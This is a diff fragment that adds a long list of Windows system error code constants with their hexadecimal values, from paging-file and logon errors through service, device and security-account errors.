+ERROR_PAGEFILE_QUOTA_EXCEEDED = 0x00000237
+ERROR_LOGON_SERVER_CONFLICT = 0x00000238
+ERROR_SYNCHRONIZATION_REQUIRED = 0x00000239
+ERROR_NET_OPEN_FAILED = 0x0000023a
+ERROR_IO_PRIVILEGE_FAILED = 0x0000023b
+ERROR_CONTROL_C_EXIT = 0x0000023c
+ERROR_MISSING_SYSTEMFILE = 0x0000023d
+ERROR_UNHANDLED_EXCEPTION = 0x0000023e
+ERROR_APP_INIT_FAILURE = 0x0000023f
+ERROR_PAGEFILE_CREATE_FAILED = 0x00000240
+ERROR_INVALID_IMAGE_HASH = 0x00000241
+ERROR_NO_PAGEFILE = 0x00000242
+ERROR_ILLEGAL_FLOAT_CONTEXT = 0x00000243
+ERROR_NO_EVENT_PAIR = 0x00000244
+ERROR_DOMAIN_CTRLR_CONFIG_ERROR = 0x00000245
+ERROR_ILLEGAL_CHARACTER = 0x00000246
+ERROR_UNDEFINED_CHARACTER = 0x00000247
+ERROR_FLOPPY_VOLUME = 0x00000248
+ERROR_BIOS_FAILED_TO_CONNECT_INTERRUPT = 0x00000249
+ERROR_BACKUP_CONTROLLER = 0x0000024a
+ERROR_MUTANT_LIMIT_EXCEEDED = 0x0000024b
+ERROR_FS_DRIVER_REQUIRED = 0x0000024c
+ERROR_CANNOT_LOAD_REGISTRY_FILE = 0x0000024d
+ERROR_DEBUG_ATTACH_FAILED = 0x0000024e
+ERROR_SYSTEM_PROCESS_TERMINATED = 0x0000024f
+ERROR_DATA_NOT_ACCEPTED = 0x00000250
+ERROR_VDM_HARD_ERROR = 0x00000251
+ERROR_DRIVER_CANCEL_TIMEOUT = 0x00000252
+ERROR_REPLY_MESSAGE_MISMATCH = 0x00000253
+ERROR_LOST_WRITEBEHIND_DATA = 0x00000254
+ERROR_CLIENT_SERVER_PARAMETERS_INVALID = 0x00000255
+ERROR_NOT_TINY_STREAM = 0x00000256
+ERROR_STACK_OVERFLOW_READ = 0x00000257
+ERROR_CONVERT_TO_LARGE = 0x00000258
+ERROR_FOUND_OUT_OF_SCOPE = 0x00000259
+ERROR_ALLOCATE_BUCKET = 0x0000025a
+ERROR_MARSHALL_OVERFLOW = 0x0000025b
+ERROR_INVALID_VARIANT = 0x0000025c
+ERROR_BAD_COMPRESSION_BUFFER = 0x0000025d
+ERROR_AUDIT_FAILED = 0x0000025e
+ERROR_TIMER_RESOLUTION_NOT_SET = 0x0000025f
+ERROR_INSUFFICIENT_LOGON_INFO = 0x00000260
+ERROR_BAD_DLL_ENTRYPOINT = 0x00000261
+ERROR_BAD_SERVICE_ENTRYPOINT = 0x00000262
+ERROR_IP_ADDRESS_CONFLICT1 = 0x00000263
+ERROR_IP_ADDRESS_CONFLICT2 = 0x00000264
+ERROR_REGISTRY_QUOTA_LIMIT = 0x00000265
+ERROR_NO_CALLBACK_ACTIVE = 0x00000266
+ERROR_PWD_TOO_SHORT = 0x00000267
+ERROR_PWD_TOO_RECENT = 0x00000268
+ERROR_PWD_HISTORY_CONFLICT = 0x00000269
+ERROR_UNSUPPORTED_COMPRESSION = 0x0000026a
+ERROR_INVALID_HW_PROFILE = 0x0000026b
+ERROR_INVALID_PLUGPLAY_DEVICE_PATH = 0x0000026c
+ERROR_QUOTA_LIST_INCONSISTENT = 0x0000026d
+ERROR_EVALUATION_EXPIRATION = 0x0000026e
+ERROR_ILLEGAL_DLL_RELOCATION = 0x0000026f
+ERROR_DLL_INIT_FAILED_LOGOFF = 0x00000270
+ERROR_VALIDATE_CONTINUE = 0x00000271
+ERROR_NO_MORE_MATCHES = 0x00000272
+ERROR_RANGE_LIST_CONFLICT = 0x00000273
+ERROR_SERVER_SID_MISMATCH = 0x00000274
+ERROR_CANT_ENABLE_DENY_ONLY = 0x00000275
+ERROR_FLOAT_MULTIPLE_FAULTS = 0x00000276
+ERROR_FLOAT_MULTIPLE_TRAPS = 0x00000277
+ERROR_NOINTERFACE = 0x00000278
+ERROR_DRIVER_FAILED_SLEEP = 0x00000279
+ERROR_CORRUPT_SYSTEM_FILE = 0x0000027a
+ERROR_COMMITMENT_MINIMUM = 0x0000027b
+ERROR_PNP_RESTART_ENUMERATION = 0x0000027c
+ERROR_SYSTEM_IMAGE_BAD_SIGNATURE = 0x0000027d
+ERROR_PNP_REBOOT_REQUIRED = 0x0000027e
+ERROR_INSUFFICIENT_POWER = 0x0000027f
+ERROR_MULTIPLE_FAULT_VIOLATION = 0x00000280
+ERROR_SYSTEM_SHUTDOWN = 0x00000281
+ERROR_PORT_NOT_SET = 0x00000282
+ERROR_DS_VERSION_CHECK_FAILURE = 0x00000283
+ERROR_RANGE_NOT_FOUND = 0x00000284
+ERROR_NOT_SAFE_MODE_DRIVER = 0x00000286
+ERROR_FAILED_DRIVER_ENTRY = 0x00000287
+ERROR_DEVICE_ENUMERATION_ERROR = 0x00000288
+ERROR_MOUNT_POINT_NOT_RESOLVED = 0x00000289
+ERROR_INVALID_DEVICE_OBJECT_PARAMETER = 0x0000028a
+ERROR_MCA_OCCURED = 0x0000028b
+ERROR_DRIVER_DATABASE_ERROR = 0x0000028c
+ERROR_SYSTEM_HIVE_TOO_LARGE = 0x0000028d
+ERROR_DRIVER_FAILED_PRIOR_UNLOAD = 0x0000028e
+ERROR_VOLSNAP_PREPARE_HIBERNATE = 0x0000028f
+ERROR_HIBERNATION_FAILURE = 0x00000290
+ERROR_PWD_TOO_LONG = 0x00000291
+ERROR_FILE_SYSTEM_LIMITATION = 0x00000299
+ERROR_ASSERTION_FAILURE = 0x0000029c
+ERROR_ACPI_ERROR = 0x0000029d
+ERROR_WOW_ASSERTION = 0x0000029e
+ERROR_PNP_BAD_MPS_TABLE = 0x0000029f
+ERROR_PNP_TRANSLATION_FAILED = 0x000002a0
+ERROR_PNP_IRQ_TRANSLATION_FAILED = 0x000002a1
+ERROR_PNP_INVALID_ID = 0x000002a2
+ERROR_WAKE_SYSTEM_DEBUGGER = 0x000002a3
+ERROR_HANDLES_CLOSED = 0x000002a4
+ERROR_EXTRANEOUS_INFORMATION = 0x000002a5
+ERROR_RXACT_COMMIT_NECESSARY = 0x000002a6
+ERROR_MEDIA_CHECK = 0x000002a7
+ERROR_GUID_SUBSTITUTION_MADE = 0x000002a8
+ERROR_STOPPED_ON_SYMLINK = 0x000002a9
+ERROR_LONGJUMP = 0x000002aa
+ERROR_PLUGPLAY_QUERY_VETOED = 0x000002ab
+ERROR_UNWIND_CONSOLIDATE = 0x000002ac
+ERROR_REGISTRY_HIVE_RECOVERED = 0x000002ad
+ERROR_DLL_MIGHT_BE_INSECURE = 0x000002ae
+ERROR_DLL_MIGHT_BE_INCOMPATIBLE = 0x000002af
+ERROR_DBG_EXCEPTION_NOT_HANDLED = 0x000002b0
+ERROR_DBG_REPLY_LATER = 0x000002b1
+ERROR_DBG_UNABLE_TO_PROVIDE_HANDLE = 0x000002b2
+ERROR_DBG_TERMINATE_THREAD = 0x000002b3
+ERROR_DBG_TERMINATE_PROCESS = 0x000002b4
+ERROR_DBG_CONTROL_C = 0x000002b5
+ERROR_DBG_PRINTEXCEPTION_C = 0x000002b6
+ERROR_DBG_RIPEXCEPTION = 0x000002b7
+ERROR_DBG_CONTROL_BREAK = 0x000002b8
+ERROR_DBG_COMMAND_EXCEPTION = 0x000002b9
+ERROR_OBJECT_NAME_EXISTS = 0x000002ba
+ERROR_THREAD_WAS_SUSPENDED = 0x000002bb
+ERROR_IMAGE_NOT_AT_BASE = 0x000002bc
+ERROR_RXACT_STATE_CREATED = 0x000002bd
+ERROR_SEGMENT_NOTIFICATION = 0x000002be
+ERROR_BAD_CURRENT_DIRECTORY = 0x000002bf
+ERROR_FT_READ_RECOVERY_FROM_BACKUP = 0x000002c0
+ERROR_FT_WRITE_RECOVERY = 0x000002c1
+ERROR_IMAGE_MACHINE_TYPE_MISMATCH = 0x000002c2
+ERROR_RECEIVE_PARTIAL = 0x000002c3
+ERROR_RECEIVE_EXPEDITED = 0x000002c4
+ERROR_RECEIVE_PARTIAL_EXPEDITED = 0x000002c5
+ERROR_EVENT_DONE = 0x000002c6
+ERROR_EVENT_PENDING = 0x000002c7
+ERROR_CHECKING_FILE_SYSTEM = 0x000002c8
+ERROR_FATAL_APP_EXIT = 0x000002c9
+ERROR_PREDEFINED_HANDLE = 0x000002ca
+ERROR_WAS_UNLOCKED = 0x000002cb
+ERROR_SERVICE_NOTIFICATION = 0x000002cc
+ERROR_WAS_LOCKED = 0x000002cd
+ERROR_LOG_HARD_ERROR = 0x000002ce
+ERROR_ALREADY_WIN32 = 0x000002cf
+ERROR_IMAGE_MACHINE_TYPE_MISMATCH_EXE = 0x000002d0
+ERROR_NO_YIELD_PERFORMED = 0x000002d1
+ERROR_TIMER_RESUME_IGNORED = 0x000002d2
+ERROR_ARBITRATION_UNHANDLED = 0x000002d3
+ERROR_CARDBUS_NOT_SUPPORTED = 0x000002d4
+ERROR_MP_PROCESSOR_MISMATCH = 0x000002d5
+ERROR_HIBERNATED = 0x000002d6
+ERROR_RESUME_HIBERNATION = 0x000002d7
+ERROR_FIRMWARE_UPDATED = 0x000002d8
+ERROR_DRIVERS_LEAKING_LOCKED_PAGES = 0x000002d9
+ERROR_WAKE_SYSTEM = 0x000002da
+ERROR_WAIT_1 = 0x000002db
+ERROR_WAIT_2 = 0x000002dc
+ERROR_WAIT_3 = 0x000002dd
+ERROR_WAIT_63 = 0x000002de
+ERROR_ABANDONED_WAIT_0 = 0x000002df
+ERROR_ABANDONED_WAIT_63 = 0x000002e0
+ERROR_USER_APC = 0x000002e1
+ERROR_KERNEL_APC = 0x000002e2
+ERROR_ALERTED = 0x000002e3
+ERROR_ELEVATION_REQUIRED = 0x000002e4
+ERROR_REPARSE = 0x000002e5
+ERROR_OPLOCK_BREAK_IN_PROGRESS = 0x000002e6
+ERROR_VOLUME_MOUNTED = 0x000002e7
+ERROR_RXACT_COMMITTED = 0x000002e8
+ERROR_NOTIFY_CLEANUP = 0x000002e9
+ERROR_PRIMARY_TRANSPORT_CONNECT_FAILED = 0x000002ea
+ERROR_PAGE_FAULT_TRANSITION = 0x000002eb
+ERROR_PAGE_FAULT_DEMAND_ZERO = 0x000002ec
+ERROR_PAGE_FAULT_COPY_ON_WRITE = 0x000002ed
+ERROR_PAGE_FAULT_GUARD_PAGE = 0x000002ee
+ERROR_PAGE_FAULT_PAGING_FILE = 0x000002ef
+ERROR_CACHE_PAGE_LOCKED = 0x000002f0
+ERROR_CRASH_DUMP = 0x000002f1
+ERROR_BUFFER_ALL_ZEROS = 0x000002f2
+ERROR_REPARSE_OBJECT = 0x000002f3
+ERROR_RESOURCE_REQUIREMENTS_CHANGED = 0x000002f4
+ERROR_TRANSLATION_COMPLETE = 0x000002f5
+ERROR_NOTHING_TO_TERMINATE = 0x000002f6
+ERROR_PROCESS_NOT_IN_JOB = 0x000002f7
+ERROR_PROCESS_IN_JOB = 0x000002f8
+ERROR_VOLSNAP_HIBERNATE_READY = 0x000002f9
+ERROR_FSFILTER_OP_COMPLETED_SUCCESSFULLY = 0x000002fa
+ERROR_INTERRUPT_VECTOR_ALREADY_CONNECTED = 0x000002fb
+ERROR_INTERRUPT_STILL_CONNECTED = 0x000002fc
+ERROR_WAIT_FOR_OPLOCK = 0x000002fd
+ERROR_DBG_EXCEPTION_HANDLED = 0x000002fe
+ERROR_DBG_CONTINUE = 0x000002ff
+ERROR_CALLBACK_POP_STACK = 0x00000300
+ERROR_COMPRESSION_DISABLED = 0x00000301
+ERROR_CANTFETCHBACKWARDS = 0x00000302
+ERROR_CANTSCROLLBACKWARDS = 0x00000303
+ERROR_ROWSNOTRELEASED = 0x00000304
+ERROR_BAD_ACCESSOR_FLAGS = 0x00000305
+ERROR_ERRORS_ENCOUNTERED = 0x00000306
+ERROR_NOT_CAPABLE = 0x00000307
+ERROR_REQUEST_OUT_OF_SEQUENCE = 0x00000308
+ERROR_VERSION_PARSE_ERROR = 0x00000309
+ERROR_BADSTARTPOSITION = 0x0000030a
+ERROR_MEMORY_HARDWARE = 0x0000030b
+ERROR_DISK_REPAIR_DISABLED = 0x0000030c
+ERROR_INSUFFICIENT_RESOURCE_FOR_SPECIFIED_SHARED_SECTION_SIZE = 0x0000030d
+ERROR_SYSTEM_POWERSTATE_TRANSITION = 0x0000030e
+ERROR_SYSTEM_POWERSTATE_COMPLEX_TRANSITION = 0x0000030f
+ERROR_MCA_EXCEPTION = 0x00000310
+ERROR_ACCESS_AUDIT_BY_POLICY = 0x00000311
+ERROR_ACCESS_DISABLED_NO_SAFER_UI_BY_POLICY = 0x00000312
+ERROR_ABANDON_HIBERFILE = 0x00000313
+ERROR_LOST_WRITEBEHIND_DATA_NETWORK_DISCONNECTED = 0x00000314
+ERROR_LOST_WRITEBEHIND_DATA_NETWORK_SERVER_ERROR = 0x00000315
+ERROR_LOST_WRITEBEHIND_DATA_LOCAL_DISK_ERROR = 0x00000316
+ERROR_BAD_MCFG_TABLE = 0x00000317
+ERROR_DISK_REPAIR_REDIRECTED = 0x00000318
+ERROR_DISK_REPAIR_UNSUCCESSFUL = 0x00000319
+ERROR_CORRUPT_LOG_OVERFULL = 0x0000031a
+ERROR_CORRUPT_LOG_CORRUPTED = 0x0000031b
+ERROR_CORRUPT_LOG_UNAVAILABLE = 0x0000031c
+ERROR_CORRUPT_LOG_DELETED_FULL = 0x0000031d
+ERROR_CORRUPT_LOG_CLEARED = 0x0000031e
+ERROR_ORPHAN_NAME_EXHAUSTED = 0x0000031f
+ERROR_OPLOCK_SWITCHED_TO_NEW_HANDLE = 0x00000320
+ERROR_CANNOT_GRANT_REQUESTED_OPLOCK = 0x00000321
+ERROR_CANNOT_BREAK_OPLOCK = 0x00000322
+ERROR_OPLOCK_HANDLE_CLOSED = 0x00000323
+ERROR_NO_ACE_CONDITION = 0x00000324
+ERROR_INVALID_ACE_CONDITION = 0x00000325
+ERROR_FILE_HANDLE_REVOKED = 0x00000326
+ERROR_IMAGE_AT_DIFFERENT_BASE = 0x00000327
+ERROR_EA_ACCESS_DENIED = 0x000003e2
+ERROR_OPERATION_ABORTED = 0x000003e3
+ERROR_IO_INCOMPLETE = 0x000003e4
+ERROR_IO_PENDING = 0x000003e5
+ERROR_NOACCESS = 0x000003e6
+ERROR_SWAPERROR = 0x000003e7
+ERROR_STACK_OVERFLOW = 0x000003e9
+ERROR_INVALID_MESSAGE = 0x000003ea
+ERROR_CAN_NOT_COMPLETE = 0x000003eb
+ERROR_INVALID_FLAGS = 0x000003ec
+ERROR_UNRECOGNIZED_VOLUME = 0x000003ed
+ERROR_FILE_INVALID = 0x000003ee
+ERROR_FULLSCREEN_MODE = 0x000003ef
+ERROR_NO_TOKEN = 0x000003f0
+ERROR_BADDB = 0x000003f1
+ERROR_BADKEY = 0x000003f2
+ERROR_CANTOPEN = 0x000003f3
+ERROR_CANTREAD = 0x000003f4
+ERROR_CANTWRITE = 0x000003f5
+ERROR_REGISTRY_RECOVERED = 0x000003f6
+ERROR_REGISTRY_CORRUPT = 0x000003f7
+ERROR_REGISTRY_IO_FAILED = 0x000003f8
+ERROR_NOT_REGISTRY_FILE = 0x000003f9
+ERROR_KEY_DELETED = 0x000003fa
+ERROR_NO_LOG_SPACE = 0x000003fb
+ERROR_KEY_HAS_CHILDREN = 0x000003fc
+ERROR_CHILD_MUST_BE_VOLATILE = 0x000003fd
+ERROR_NOTIFY_ENUM_DIR = 0x000003fe
+ERROR_DEPENDENT_SERVICES_RUNNING = 0x0000041b
+ERROR_INVALID_SERVICE_CONTROL = 0x0000041c
+ERROR_SERVICE_REQUEST_TIMEOUT = 0x0000041d
+ERROR_SERVICE_NO_THREAD = 0x0000041e
+ERROR_SERVICE_DATABASE_LOCKED = 0x0000041f
+ERROR_SERVICE_ALREADY_RUNNING = 0x00000420
+ERROR_INVALID_SERVICE_ACCOUNT = 0x00000421
+ERROR_SERVICE_DISABLED = 0x00000422
+ERROR_CIRCULAR_DEPENDENCY = 0x00000423
+ERROR_SERVICE_DOES_NOT_EXIST = 0x00000424
+ERROR_SERVICE_CANNOT_ACCEPT_CTRL = 0x00000425
+ERROR_SERVICE_NOT_ACTIVE = 0x00000426
+ERROR_FAILED_SERVICE_CONTROLLER_CONNECT = 0x00000427
+ERROR_EXCEPTION_IN_SERVICE = 0x00000428
+ERROR_DATABASE_DOES_NOT_EXIST = 0x00000429
+ERROR_SERVICE_SPECIFIC_ERROR = 0x0000042a
+ERROR_PROCESS_ABORTED = 0x0000042b
+ERROR_SERVICE_DEPENDENCY_FAIL = 0x0000042c
+ERROR_SERVICE_LOGON_FAILED = 0x0000042d
+ERROR_SERVICE_START_HANG = 0x0000042e
+ERROR_INVALID_SERVICE_LOCK = 0x0000042f
+ERROR_SERVICE_MARKED_FOR_DELETE = 0x00000430
+ERROR_SERVICE_EXISTS = 0x00000431
+ERROR_ALREADY_RUNNING_LKG = 0x00000432
+ERROR_SERVICE_DEPENDENCY_DELETED = 0x00000433
+ERROR_BOOT_ALREADY_ACCEPTED = 0x00000434
+ERROR_SERVICE_NEVER_STARTED = 0x00000435
+ERROR_DUPLICATE_SERVICE_NAME = 0x00000436
+ERROR_DIFFERENT_SERVICE_ACCOUNT = 0x00000437
+ERROR_CANNOT_DETECT_DRIVER_FAILURE = 0x00000438
+ERROR_CANNOT_DETECT_PROCESS_ABORT = 0x00000439
+ERROR_NO_RECOVERY_PROGRAM = 0x0000043a
+ERROR_SERVICE_NOT_IN_EXE = 0x0000043b
+ERROR_NOT_SAFEBOOT_SERVICE = 0x0000043c
+ERROR_END_OF_MEDIA = 0x0000044c
+ERROR_FILEMARK_DETECTED = 0x0000044d
+ERROR_BEGINNING_OF_MEDIA = 0x0000044e
+ERROR_SETMARK_DETECTED = 0x0000044f
+ERROR_NO_DATA_DETECTED = 0x00000450
+ERROR_PARTITION_FAILURE = 0x00000451
+ERROR_INVALID_BLOCK_LENGTH = 0x00000452
+ERROR_DEVICE_NOT_PARTITIONED = 0x00000453
+ERROR_UNABLE_TO_LOCK_MEDIA = 0x00000454
+ERROR_UNABLE_TO_UNLOAD_MEDIA = 0x00000455
+ERROR_MEDIA_CHANGED = 0x00000456
+ERROR_BUS_RESET = 0x00000457
+ERROR_NO_MEDIA_IN_DRIVE = 0x00000458
+ERROR_NO_UNICODE_TRANSLATION = 0x00000459
+ERROR_DLL_INIT_FAILED = 0x0000045a
+ERROR_SHUTDOWN_IN_PROGRESS = 0x0000045b
+ERROR_NO_SHUTDOWN_IN_PROGRESS = 0x0000045c
+ERROR_IO_DEVICE = 0x0000045d
+ERROR_SERIAL_NO_DEVICE = 0x0000045e
+ERROR_IRQ_BUSY = 0x0000045f
+ERROR_MORE_WRITES = 0x00000460
+ERROR_COUNTER_TIMEOUT = 0x00000461
+ERROR_FLOPPY_ID_MARK_NOT_FOUND = 0x00000462
+ERROR_FLOPPY_WRONG_CYLINDER = 0x00000463
+ERROR_FLOPPY_UNKNOWN_ERROR = 0x00000464
+ERROR_FLOPPY_BAD_REGISTERS = 0x00000465
+ERROR_DISK_RECALIBRATE_FAILED = 0x00000466
+ERROR_DISK_OPERATION_FAILED = 0x00000467
+ERROR_DISK_RESET_FAILED = 0x00000468
+ERROR_EOM_OVERFLOW = 0x00000469
+ERROR_NOT_ENOUGH_SERVER_MEMORY = 0x0000046a
+ERROR_POSSIBLE_DEADLOCK = 0x0000046b
+ERROR_MAPPED_ALIGNMENT = 0x0000046c
+ERROR_SET_POWER_STATE_VETOED = 0x00000474
+ERROR_SET_POWER_STATE_FAILED = 0x00000475
+ERROR_TOO_MANY_LINKS = 0x00000476
+ERROR_OLD_WIN_VERSION = 0x0000047e
+ERROR_APP_WRONG_OS = 0x0000047f
+ERROR_SINGLE_INSTANCE_APP = 0x00000480
+ERROR_RMODE_APP = 0x00000481
+ERROR_INVALID_DLL = 0x00000482
+ERROR_NO_ASSOCIATION = 0x00000483
+ERROR_DDE_FAIL = 0x00000484
+ERROR_DLL_NOT_FOUND = 0x00000485
+ERROR_NO_MORE_USER_HANDLES = 0x00000486
+ERROR_MESSAGE_SYNC_ONLY = 0x00000487
+ERROR_SOURCE_ELEMENT_EMPTY = 0x00000488
+ERROR_DESTINATION_ELEMENT_FULL = 0x00000489
+ERROR_ILLEGAL_ELEMENT_ADDRESS = 0x0000048a
+ERROR_MAGAZINE_NOT_PRESENT = 0x0000048b
+ERROR_DEVICE_REINITIALIZATION_NEEDED = 0x0000048c
+ERROR_DEVICE_REQUIRES_CLEANING = 0x0000048d
+ERROR_DEVICE_DOOR_OPEN = 0x0000048e
+ERROR_DEVICE_NOT_CONNECTED = 0x0000048f
+ERROR_NOT_FOUND = 0x00000490
+ERROR_NO_MATCH = 0x00000491
+ERROR_SET_NOT_FOUND = 0x00000492
+ERROR_POINT_NOT_FOUND = 0x00000493
+ERROR_NO_TRACKING_SERVICE = 0x00000494
+ERROR_NO_VOLUME_ID = 0x00000495
+ERROR_UNABLE_TO_REMOVE_REPLACED = 0x00000497
+ERROR_UNABLE_TO_MOVE_REPLACEMENT = 0x00000498
+ERROR_UNABLE_TO_MOVE_REPLACEMENT_2 = 0x00000499
+ERROR_JOURNAL_DELETE_IN_PROGRESS = 0x0000049a
+ERROR_JOURNAL_NOT_ACTIVE = 0x0000049b
+ERROR_POTENTIAL_FILE_FOUND = 0x0000049c
+ERROR_JOURNAL_ENTRY_DELETED = 0x0000049d
+ERROR_SHUTDOWN_IS_SCHEDULED = 0x000004a6
+ERROR_SHUTDOWN_USERS_LOGGED_ON = 0x000004a7
+ERROR_BAD_DEVICE = 0x000004b0
+ERROR_CONNECTION_UNAVAIL = 0x000004b1
+ERROR_DEVICE_ALREADY_REMEMBERED = 0x000004b2
+ERROR_NO_NET_OR_BAD_PATH = 0x000004b3
+ERROR_BAD_PROVIDER = 0x000004b4
+ERROR_CANNOT_OPEN_PROFILE = 0x000004b5
+ERROR_BAD_PROFILE = 0x000004b6
+ERROR_NOT_CONTAINER = 0x000004b7
+ERROR_EXTENDED_ERROR = 0x000004b8
+ERROR_INVALID_GROUPNAME = 0x000004b9
+ERROR_INVALID_COMPUTERNAME = 0x000004ba
+ERROR_INVALID_EVENTNAME = 0x000004bb
+ERROR_INVALID_DOMAINNAME = 0x000004bc
+ERROR_INVALID_SERVICENAME = 0x000004bd
+ERROR_INVALID_NETNAME = 0x000004be
+ERROR_INVALID_SHARENAME = 0x000004bf
+ERROR_INVALID_PASSWORDNAME = 0x000004c0
+ERROR_INVALID_MESSAGENAME = 0x000004c1
+ERROR_INVALID_MESSAGEDEST = 0x000004c2
+ERROR_SESSION_CREDENTIAL_CONFLICT = 0x000004c3
+ERROR_REMOTE_SESSION_LIMIT_EXCEEDED = 0x000004c4
+ERROR_DUP_DOMAINNAME = 0x000004c5
+ERROR_NO_NETWORK = 0x000004c6
+ERROR_CANCELLED = 0x000004c7
+ERROR_USER_MAPPED_FILE = 0x000004c8
+ERROR_CONNECTION_REFUSED = 0x000004c9
+ERROR_GRACEFUL_DISCONNECT = 0x000004ca
+ERROR_ADDRESS_ALREADY_ASSOCIATED = 0x000004cb
+ERROR_ADDRESS_NOT_ASSOCIATED = 0x000004cc
+ERROR_CONNECTION_INVALID = 0x000004cd
+ERROR_CONNECTION_ACTIVE = 0x000004ce
+ERROR_NETWORK_UNREACHABLE = 0x000004cf
+ERROR_HOST_UNREACHABLE = 0x000004d0
+ERROR_PROTOCOL_UNREACHABLE = 0x000004d1
+ERROR_PORT_UNREACHABLE = 0x000004d2
+ERROR_REQUEST_ABORTED = 0x000004d3
+ERROR_CONNECTION_ABORTED = 0x000004d4
+ERROR_RETRY = 0x000004d5
+ERROR_CONNECTION_COUNT_LIMIT = 0x000004d6
+ERROR_LOGIN_TIME_RESTRICTION = 0x000004d7
+ERROR_LOGIN_WKSTA_RESTRICTION = 0x000004d8
+ERROR_INCORRECT_ADDRESS = 0x000004d9
+ERROR_ALREADY_REGISTERED = 0x000004da
+ERROR_SERVICE_NOT_FOUND = 0x000004db
+ERROR_NOT_AUTHENTICATED = 0x000004dc
+ERROR_NOT_LOGGED_ON = 0x000004dd
+ERROR_CONTINUE = 0x000004de
+ERROR_ALREADY_INITIALIZED = 0x000004df
+ERROR_NO_MORE_DEVICES = 0x000004e0
+ERROR_NO_SUCH_SITE = 0x000004e1
+ERROR_DOMAIN_CONTROLLER_EXISTS = 0x000004e2
+ERROR_ONLY_IF_CONNECTED = 0x000004e3
+ERROR_OVERRIDE_NOCHANGES = 0x000004e4
+ERROR_BAD_USER_PROFILE = 0x000004e5
+ERROR_NOT_SUPPORTED_ON_SBS = 0x000004e6
+ERROR_SERVER_SHUTDOWN_IN_PROGRESS = 0x000004e7
+ERROR_HOST_DOWN = 0x000004e8
+ERROR_NON_ACCOUNT_SID = 0x000004e9
+ERROR_NON_DOMAIN_SID = 0x000004ea
+ERROR_APPHELP_BLOCK = 0x000004eb
+ERROR_ACCESS_DISABLED_BY_POLICY = 0x000004ec
+ERROR_REG_NAT_CONSUMPTION = 0x000004ed
+ERROR_CSCSHARE_OFFLINE = 0x000004ee
+ERROR_PKINIT_FAILURE = 0x000004ef
+ERROR_SMARTCARD_SUBSYSTEM_FAILURE = 0x000004f0
+ERROR_DOWNGRADE_DETECTED = 0x000004f1
+ERROR_MACHINE_LOCKED = 0x000004f7
+ERROR_CALLBACK_SUPPLIED_INVALID_DATA = 0x000004f9
+ERROR_SYNC_FOREGROUND_REFRESH_REQUIRED = 0x000004fa
+ERROR_DRIVER_BLOCKED = 0x000004fb
+ERROR_INVALID_IMPORT_OF_NON_DLL = 0x000004fc
+ERROR_ACCESS_DISABLED_WEBBLADE = 0x000004fd
+ERROR_ACCESS_DISABLED_WEBBLADE_TAMPER = 0x000004fe
+ERROR_RECOVERY_FAILURE = 0x000004ff
+ERROR_ALREADY_FIBER = 0x00000500
+ERROR_ALREADY_THREAD = 0x00000501
+ERROR_STACK_BUFFER_OVERRUN = 0x00000502
+ERROR_PARAMETER_QUOTA_EXCEEDED = 0x00000503
+ERROR_DEBUGGER_INACTIVE = 0x00000504
+ERROR_DELAY_LOAD_FAILED = 0x00000505
+ERROR_VDM_DISALLOWED = 0x00000506
+ERROR_UNIDENTIFIED_ERROR = 0x00000507
+ERROR_INVALID_CRUNTIME_PARAMETER = 0x00000508
+ERROR_BEYOND_VDL = 0x00000509
+ERROR_INCOMPATIBLE_SERVICE_SID_TYPE = 0x0000050a
+ERROR_DRIVER_PROCESS_TERMINATED = 0x0000050b
+ERROR_IMPLEMENTATION_LIMIT = 0x0000050c
+ERROR_PROCESS_IS_PROTECTED = 0x0000050d
+ERROR_SERVICE_NOTIFY_CLIENT_LAGGING = 0x0000050e
+ERROR_DISK_QUOTA_EXCEEDED = 0x0000050f
+ERROR_CONTENT_BLOCKED = 0x00000510
+ERROR_INCOMPATIBLE_SERVICE_PRIVILEGE = 0x00000511
+ERROR_APP_HANG = 0x00000512
+ERROR_INVALID_LABEL = 0x00000513
+ERROR_NOT_ALL_ASSIGNED = 0x00000514
+ERROR_SOME_NOT_MAPPED = 0x00000515
+ERROR_NO_QUOTAS_FOR_ACCOUNT = 0x00000516
+ERROR_LOCAL_USER_SESSION_KEY = 0x00000517
+ERROR_NULL_LM_PASSWORD = 0x00000518
+ERROR_UNKNOWN_REVISION = 0x00000519
+ERROR_REVISION_MISMATCH = 0x0000051a
+ERROR_INVALID_OWNER = 0x0000051b
+ERROR_INVALID_PRIMARY_GROUP = 0x0000051c
+ERROR_NO_IMPERSONATION_TOKEN = 0x0000051d
+ERROR_CANT_DISABLE_MANDATORY = 0x0000051e
+ERROR_NO_LOGON_SERVERS = 0x0000051f
+ERROR_NO_SUCH_LOGON_SESSION = 0x00000520
+ERROR_NO_SUCH_PRIVILEGE = 0x00000521
+ERROR_PRIVILEGE_NOT_HELD = 0x00000522
+ERROR_INVALID_ACCOUNT_NAME = 0x00000523
+ERROR_USER_EXISTS = 0x00000524
+ERROR_NO_SUCH_USER = 0x00000525
+ERROR_GROUP_EXISTS = 0x00000526
+ERROR_NO_SUCH_GROUP = 0x00000527
+ERROR_MEMBER_IN_GROUP = 0x00000528
+ERROR_MEMBER_NOT_IN_GROUP = 0x00000529
+ERROR_LAST_ADMIN = 0x0000052a
+ERROR_WRONG_PASSWORD = 0x0000052b
+ERROR_ILL_FORMED_PASSWORD = 0x0000052c
+ERROR_PASSWORD_RESTRICTION = 0x0000052d
+ERROR_LOGON_FAILURE = 0x0000052e
+ERROR_ACCOUNT_RESTRICTION = 0x0000052f
+ERROR_INVALID_LOGON_HOURS = 0x00000530
+ERROR_INVALID_WORKSTATION = 0x00000531
+ERROR_PASSWORD_EXPIRED = 0x00000532
+ERROR_ACCOUNT_DISABLED = 0x00000533
+ERROR_NONE_MAPPED = 0x00000534
+ERROR_TOO_MANY_LUIDS_REQUESTED = 0x00000535
+ERROR_LUIDS_EXHAUSTED = 0x00000536
+ERROR_INVALID_SUB_AUTHORITY = 0x00000537
+ERROR_INVALID_ACL = 0x00000538
+ERROR_INVALID_SID = 0x00000539
+ERROR_INVALID_SECURITY_DESCR = 0x0000053a
+ERROR_BAD_INHERITANCE_ACL = 0x0000053c
+ERROR_SERVER_DISABLED = 0x0000053d
+ERROR_SERVER_NOT_DISABLED = 0x0000053e
+ERROR_INVALID_ID_AUTHORITY = 0x0000053f
+ERROR_ALLOTTED_SPACE_EXCEEDED = 0x00000540
+ERROR_INVALID_GROUP_ATTRIBUTES = 0x00000541
+ERROR_BAD_IMPERSONATION_LEVEL = 0x00000542
+ERROR_CANT_OPEN_ANONYMOUS = 0x00000543
+ERROR_BAD_VALIDATION_CLASS = 0x00000544
+ERROR_BAD_TOKEN_TYPE = 0x00000545
